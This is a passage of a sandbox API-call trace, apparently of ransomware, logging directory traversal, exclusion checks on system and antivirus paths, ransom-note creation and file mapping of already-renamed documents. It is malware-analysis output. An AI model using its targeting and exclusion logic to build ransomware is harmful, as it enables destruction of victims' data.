0x26c [0185.349] GetFileSizeEx (in: hFile=0x26c, lpFileSize=0x36fdfa8 | out: lpFileSize=0x36fdfa8*=26695) returned 1 [0185.349] CreateFileMappingW (hFile=0x26c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x270 [0185.349] MapViewOfFile (hFileMappingObject=0x270, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.350] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.350] CloseHandle (hObject=0x270) returned 1 [0185.350] CloseHandle (hObject=0x26c) returned 1 [0185.350] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.350] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdef6a930, ftCreationTime.dwHighDateTime=0x1d4c5fa, ftLastAccessTime.dwLowDateTime=0x2dc82740, ftLastAccessTime.dwHighDateTime=0x1d4d222, ftLastWriteTime.dwLowDateTime=0xaea1ec60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x17f05, dwReserved0=0x0, dwReserved1=0x0, cFileName="Z1Ci0uT2mheh7iNWJ6Ft.docx.jwuBYt", cAlternateFileName="Z1CI0U~1.JWU")) returned 1 [0185.350] lstrcmpiW (lpString1="Z1Ci0uT2mheh7iNWJ6Ft.docx.jwuBYt", lpString2="DECRYPT-FILES.txt") returned 1 [0185.350] lstrcmpiW (lpString1="Z1Ci0uT2mheh7iNWJ6Ft.docx.jwuBYt", lpString2="autorun.inf") returned 1 [0185.350] lstrcmpiW (lpString1="Z1Ci0uT2mheh7iNWJ6Ft.docx.jwuBYt", lpString2="boot.ini") returned 1 [0185.350] lstrcmpiW (lpString1="Z1Ci0uT2mheh7iNWJ6Ft.docx.jwuBYt", lpString2="desktop.ini") returned 1 [0185.350] lstrcmpiW (lpString1="Z1Ci0uT2mheh7iNWJ6Ft.docx.jwuBYt", lpString2="ntuser.dat") returned 1 [0185.350] lstrcmpiW (lpString1="Z1Ci0uT2mheh7iNWJ6Ft.docx.jwuBYt", lpString2="iconcache.db") returned 1 [0185.350] lstrcmpiW (lpString1="Z1Ci0uT2mheh7iNWJ6Ft.docx.jwuBYt", lpString2="bootsect.bak") returned 1 [0185.350] lstrcmpiW (lpString1="Z1Ci0uT2mheh7iNWJ6Ft.docx.jwuBYt", lpString2="ntuser.dat.log") returned 1 [0185.350] lstrcmpiW (lpString1="Z1Ci0uT2mheh7iNWJ6Ft.docx.jwuBYt", lpString2="thumbs.db") returned 1 [0185.350] lstrcmpiW (lpString1="Z1Ci0uT2mheh7iNWJ6Ft.docx.jwuBYt", lpString2="Bootfont.bin") returned 1 [0185.350] lstrlenW (lpString="Z1Ci0uT2mheh7iNWJ6Ft.docx.jwuBYt") returned 32 [0185.351] lstrcmpiW (lpString1="jwuBYt", lpString2="lnk") returned -1 [0185.351] lstrcmpiW (lpString1="jwuBYt", lpString2="exe") returned 1 [0185.351] lstrcmpiW (lpString1="jwuBYt", lpString2="sys") returned -1 [0185.351] lstrcmpiW (lpString1="jwuBYt", lpString2="dll") returned 1 [0185.351] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\") returned 75 [0185.351] lstrlenW (lpString="Z1Ci0uT2mheh7iNWJ6Ft.docx.jwuBYt") returned 32 [0185.351] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\" [0185.351] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\", lpString2="Z1Ci0uT2mheh7iNWJ6Ft.docx.jwuBYt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\Z1Ci0uT2mheh7iNWJ6Ft.docx.jwuBYt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\Z1Ci0uT2mheh7iNWJ6Ft.docx.jwuBYt" [0185.351] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.351] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\i4ouEKS0Y1j5q3bJi\\Z1Ci0uT2mheh7iNWJ6Ft.docx.jwuBYt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\i4oueks0y1j5q3bji\\z1ci0ut2mheh7inwj6ft.docx.jwubyt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x26c [0185.351] GetFileSizeEx (in: hFile=0x26c, lpFileSize=0x36fdfa8 | out: lpFileSize=0x36fdfa8*=98053) returned 1 [0185.351] CreateFileMappingW (hFile=0x26c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x270 [0185.352] MapViewOfFile (hFileMappingObject=0x270, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.352] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.352] CloseHandle (hObject=0x270) returned 1 [0185.352] CloseHandle (hObject=0x26c) returned 1 [0185.352] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.353] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdef6a930, ftCreationTime.dwHighDateTime=0x1d4c5fa, ftLastAccessTime.dwLowDateTime=0x2dc82740, ftLastAccessTime.dwHighDateTime=0x1d4d222, ftLastWriteTime.dwLowDateTime=0xaea1ec60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x17f05, dwReserved0=0x0, dwReserved1=0x0, cFileName="Z1Ci0uT2mheh7iNWJ6Ft.docx.jwuBYt", cAlternateFileName="Z1CI0U~1.JWU")) returned 0 [0185.353] FindClose (in: hFindFile=0x4798f8 | out: hFindFile=0x4798f8) returned 1 [0185.353] CloseHandle (hObject=0x264) returned 1 [0185.353] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60887270, ftCreationTime.dwHighDateTime=0x1d4cac5, ftLastAccessTime.dwLowDateTime=0xaea6af20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaea6af20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L4RiddZbkkAp", cAlternateFileName="L4RIDD~1")) returned 1 [0185.353] lstrcmpW (lpString1="L4RiddZbkkAp", lpString2=".") returned 1 [0185.353] lstrcmpW (lpString1="L4RiddZbkkAp", lpString2="..") returned 1 [0185.353] lstrcatW (in: lpString1="L4RiddZbkkAp", lpString2="\\" | out: lpString1="L4RiddZbkkAp\\") returned="L4RiddZbkkAp\\" [0185.353] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\", lpString2="L4RiddZbkkAp\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\" [0185.353] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\", lpSrch="\\Program Files") returned 0x0 [0185.353] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\", lpSrch=":\\Windows") returned 0x0 [0185.353] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\", lpSrch="\\Games\\") returned 0x0 [0185.353] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\", lpSrch="\\Tor Browser\\") returned 0x0 [0185.353] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\", lpSrch="\\ProgramData\\") returned 0x0 [0185.353] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0185.353] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0185.353] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0185.353] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\", lpSrch="\\All Users") returned 0x0 [0185.353] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\", lpSrch="\\IETldCache\\") returned 0x0 [0185.353] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\", lpSrch="\\Local Settings\\") returned 0x0 [0185.353] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\", lpSrch="\\AppData\\Local") returned 0x0 [0185.353] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\", lpSrch="AhnLab") returned 0x0 [0185.354] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0185.354] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\") returned 70 [0185.354] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.354] wsprintfW (in: param_1=0x36fe7f0, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\\\0a16c9.tmp") returned 81 [0185.354] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\l4riddzbkkap\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x264 [0185.356] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\") returned 70 [0185.356] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0185.356] wsprintfW (in: param_1=0x36fe7f0, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\\\DECRYPT-FILES.txt") returned 88 [0185.356] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\l4riddzbkkap\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.356] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\") returned 70 [0185.356] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\*" [0185.356] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\*", lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60887270, ftCreationTime.dwHighDateTime=0x1d4cac5, ftLastAccessTime.dwLowDateTime=0xf1306020, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1306020, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798f8 [0185.356] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0185.356] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x60887270, ftCreationTime.dwHighDateTime=0x1d4cac5, ftLastAccessTime.dwLowDateTime=0xf1306020, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1306020, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0185.356] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0185.356] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0185.356] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf1306020, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xf1306020, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xf1306020, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0185.356] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0185.356] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0185.356] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0185.356] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0185.356] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0185.356] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0185.356] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0185.356] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0185.356] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0185.356] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0185.356] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.356] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0185.356] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0185.357] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0185.357] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0185.357] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\") returned 70 [0185.357] lstrlenW (lpString="0a16c9.tmp") returned 10 [0185.357] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\" [0185.357] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\0a16c9.tmp" [0185.357] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.357] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\l4riddzbkkap\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0185.357] CloseHandle (hObject=0x0) returned 0 [0185.357] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.357] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5947a150, ftCreationTime.dwHighDateTime=0x1d4cc7a, ftLastAccessTime.dwLowDateTime=0x249f1a10, ftLastAccessTime.dwHighDateTime=0x1d4c7e2, ftLastWriteTime.dwLowDateTime=0xaea6af20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x1151, dwReserved0=0x0, dwReserved1=0x0, cFileName="Bp7D8ssZyaPUB.odt.bDjWT", cAlternateFileName="BP7D8S~1.BDJ")) returned 1 [0185.357] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.odt.bDjWT", lpString2="DECRYPT-FILES.txt") returned -1 [0185.357] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.odt.bDjWT", lpString2="autorun.inf") returned 1 [0185.357] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.odt.bDjWT", lpString2="boot.ini") returned 1 [0185.357] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.odt.bDjWT", lpString2="desktop.ini") returned -1 [0185.357] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.odt.bDjWT", lpString2="ntuser.dat") returned -1 [0185.358] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.odt.bDjWT", lpString2="iconcache.db") returned -1 [0185.358] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.odt.bDjWT", lpString2="bootsect.bak") returned 1 [0185.358] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.odt.bDjWT", lpString2="ntuser.dat.log") returned -1 [0185.358] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.odt.bDjWT", lpString2="thumbs.db") returned -1 [0185.358] lstrcmpiW (lpString1="Bp7D8ssZyaPUB.odt.bDjWT", lpString2="Bootfont.bin") returned 1 [0185.358] lstrlenW (lpString="Bp7D8ssZyaPUB.odt.bDjWT") returned 23 [0185.358] lstrcmpiW (lpString1="bDjWT", lpString2="lnk") returned -1 [0185.358] lstrcmpiW (lpString1="bDjWT", lpString2="exe") returned -1 [0185.358] lstrcmpiW (lpString1="bDjWT", lpString2="sys") returned -1 [0185.358] lstrcmpiW (lpString1="bDjWT", lpString2="dll") returned -1 [0185.358] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\") returned 70 [0185.358] lstrlenW (lpString="Bp7D8ssZyaPUB.odt.bDjWT") returned 23 [0185.358] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\" [0185.358] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\", lpString2="Bp7D8ssZyaPUB.odt.bDjWT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\Bp7D8ssZyaPUB.odt.bDjWT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\Bp7D8ssZyaPUB.odt.bDjWT" [0185.358] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.358] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\Bp7D8ssZyaPUB.odt.bDjWT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\l4riddzbkkap\\bp7d8sszyapub.odt.bdjwt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x26c [0185.358] GetFileSizeEx (in: hFile=0x26c, lpFileSize=0x36fdfa8 | out: lpFileSize=0x36fdfa8*=4433) returned 1 [0185.358] CreateFileMappingW (hFile=0x26c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x270 [0185.358] MapViewOfFile (hFileMappingObject=0x270, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0185.359] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0185.359] CloseHandle (hObject=0x270) returned 1 [0185.359] CloseHandle (hObject=0x26c) returned 1 [0185.359] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0185.360] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaea44dc0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaea44dc0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaea44dc0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0185.360] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0185.360] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd2416a0, ftCreationTime.dwHighDateTime=0x1d4cd00, ftLastAccessTime.dwLowDateTime=0xb2b14270, ftLastAccessTime.dwHighDateTime=0x1d4d105, ftLastWriteTime.dwLowDateTime=0xaea6af20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x16849, dwReserved0=0x0, dwReserved1=0x0, cFileName="Osv2.doc.bDjWT", cAlternateFileName="OSV2DO~1.BDJ")) returned 1 [0185.360] lstrcmpiW (lpString1="Osv2.doc.bDjWT", lpString2="DECRYPT-FILES.txt") returned 1 [0185.360] lstrcmpiW (lpString1="Osv2.doc.bDjWT", lpString2="autorun.inf") returned 1 [0185.360] lstrcmpiW (lpString1="Osv2.doc.bDjWT", lpString2="boot.ini") returned 1 [0185.360] lstrcmpiW (lpString1="Osv2.doc.bDjWT", lpString2="desktop.ini") returned 1 [0185.360] lstrcmpiW (lpString1="Osv2.doc.bDjWT", lpString2="ntuser.dat") returned 1 [0185.360] lstrcmpiW (lpString1="Osv2.doc.bDjWT", lpString2="iconcache.db") returned 1 [0185.360] lstrcmpiW (lpString1="Osv2.doc.bDjWT", lpString2="bootsect.bak") returned 1 [0185.360] lstrcmpiW (lpString1="Osv2.doc.bDjWT", lpString2="ntuser.dat.log") returned 1 [0185.360] lstrcmpiW (lpString1="Osv2.doc.bDjWT", lpString2="thumbs.db") returned -1 [0185.360] lstrcmpiW (lpString1="Osv2.doc.bDjWT", lpString2="Bootfont.bin") returned 1 [0185.360] lstrlenW (lpString="Osv2.doc.bDjWT") returned 14 [0185.360] lstrcmpiW (lpString1="bDjWT", lpString2="lnk") returned -1 [0185.360] lstrcmpiW (lpString1="bDjWT", lpString2="exe") returned -1 [0185.360] lstrcmpiW (lpString1="bDjWT", lpString2="sys") returned -1 [0185.360] lstrcmpiW (lpString1="bDjWT", lpString2="dll") returned -1 [0185.360] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\") returned 70 [0185.360] lstrlenW (lpString="Osv2.doc.bDjWT") returned 14 [0185.360] lstrcpyW (in: lpString1=0x36fe7e0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\" [0185.360] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\", lpString2="Osv2.doc.bDjWT" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\Osv2.doc.bDjWT") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\Osv2.doc.bDjWT" [0185.360] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0185.360] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\S3f3UGhxqbgggRUc\\L4RiddZbkkAp\\Osv2.doc.bDjWT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\s3f3ughxqbgggruc\\l4riddzbkkap\\osv2.doc.bdjwt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x26c [0185.361] GetFileSizeEx (in: hFile=0x26c, 